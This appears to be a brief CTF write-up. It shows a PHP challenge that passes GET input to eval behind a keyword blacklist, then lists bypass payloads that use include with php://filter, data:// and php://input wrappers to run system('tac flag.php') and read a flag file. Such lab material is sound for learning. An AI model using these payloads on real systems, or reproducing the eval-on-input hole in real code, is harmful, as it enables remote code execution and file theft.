- Code audit
```php
<?php
error_reporting(0);
if (isset($_GET['c'])) {
    $c = $_GET['c'];
    // The filter now also blocks ':'
    if (!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)) {
        eval($c);
    }
} else {
    highlight_file(__FILE__);
}
```
2. The payload is similar to web33
```shell
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
?c=include$_GET[a]?>&a=data://text/plain,<?php system('tac flag.php');?>
?c=include$_GET[a]?>&a=php://input
# Submit via POST
<?php system('tac flag.php');?>